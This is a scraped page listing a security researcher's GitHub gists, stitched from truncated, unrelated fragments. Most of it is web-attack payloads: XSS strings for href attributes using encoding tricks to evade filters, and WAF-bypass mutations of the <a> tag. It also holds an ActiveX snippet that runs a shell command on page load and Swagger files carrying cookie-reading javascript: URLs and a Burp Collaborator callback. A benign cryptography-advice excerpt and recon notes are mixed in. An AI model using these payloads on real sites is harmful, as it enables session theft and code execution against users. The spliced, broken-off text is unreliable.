Superbug (xsuperbug), Turkey
@xsuperbug
xsuperbug / href_bypass.html
Created October 15, 2020 14:58 — forked from hackerscrolls/href_bypass.html
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
xsuperbug / gist:21d9ed0b1747294d6e62
Last active April 12, 2023 15:02
TPO XSS Vulnerability (Responsible disclosure)
About the Vulnerability
=======================
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of concept
================
Because the file upload module performs no extension or content checks, malicious content can be uploaded to the system.
(Note: the link was modified so that the XSS vulnerability would trigger.)
The faulty page where the file is located:
xsuperbug / gist:efdacfd4dc497d38679891da21f8fb5d
Created April 5, 2017 19:29
(Updated) Cryptographic Right Answers

Encrypting data (Was: AES-CTR with HMAC): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.

You care about this if: you're hiding information from users or the network.

All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.

Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.

Symmetric key length (Was: Use 256 bit keys

xsuperbug / mutation_a.txt
Created October 15, 2020 14:58 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
<script language="javascript" type="text/javascript">
function OpenFile(){
alert ('Work');
var x = new ActiveXObject("WScript.Shell");
x.run('calc.exe');
}
</script>
</head>
<body onload="OpenFile()">
# Load Rebex ECC DLL for net20
# Source: http://labs.rebex.net/curves
$EncodedCompressedFile = @'
xsuperbug / reconme.txt
Created May 29, 2018 21:34 — forked from rootxharsh/reconme.txt
Aquatone and gowitness
###
If you use Kali or any other distro over SSH (for example a Droplet or a VM with no GUI), you might have noticed that aquatone requires Xorg.
These few lines will help you create a report of domains with response headers and screenshots using gowitness instead.
Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone
> Setup Kali Linux Hyper-V OR Ubuntu droplet
> Set the VM/Droplet to start Apache on boot (and SSH as well, if it's a VM)
> Set VM to start on host boot
swagger: "2.0"
info:
  title: "Swagger Sample App"
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact:
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <img src="https://828fh2yinnngr821bgxe95574yapye.burpcollaborator.net">
paths:
  /:
    get:
      responses:
        200:
xsuperbug / test
Last active March 20, 2019 18:14